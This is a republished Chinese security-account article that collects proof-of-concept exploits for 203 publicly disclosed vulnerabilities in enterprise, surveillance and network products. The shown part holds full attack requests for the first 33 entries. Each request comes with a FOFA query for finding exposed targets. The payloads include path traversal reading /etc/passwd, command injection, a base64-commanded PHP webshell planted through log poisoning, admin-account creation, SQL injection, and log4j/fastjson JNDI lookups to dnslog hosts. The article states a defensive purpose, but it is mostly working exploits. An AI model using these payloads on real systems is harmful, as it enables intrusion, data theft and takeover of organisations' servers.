Collection of Publicly Disclosed Internet Vulnerabilities, 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities makes up a large share of attacks in offensive/defensive engagements, and we hope this article gives defenders some help. Defenders can use its contents to carry out risk checks.

Sources: This article covers 203 PoCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the internet and compiled for publication by the 网络安全新视界 team.

Patches: All of these are public vulnerabilities; for patches or remediation plans, contact the product vendor.

Content: Because of length limits, a few PoCs that are too long are replaced with the word PAYLOAD throughout; search for the full PoC yourself if you need it.

Legal: If any content in this article infringes a party's legitimate rights, contact the 网络安全新视界 team via the account's message backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" step. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
21. 大华 ICC intelligent IoT integrated management platform random remote code execution
22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE collaboration management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普掌上校园 service management platform service.action remote command execution
77. F22 clothing management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS video management system dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload
PoC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin backend with the default account admin, perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=第一步登录获取的cookie
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x

The payload is the following statement, double URL-encoded

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the file is uploaded, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request: executes the function and applies base64 encoding
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Send the following request to the target to run the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command string
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
Leaked content includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
Leaked content includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function to compute the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. 大华 ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}


22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友 NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
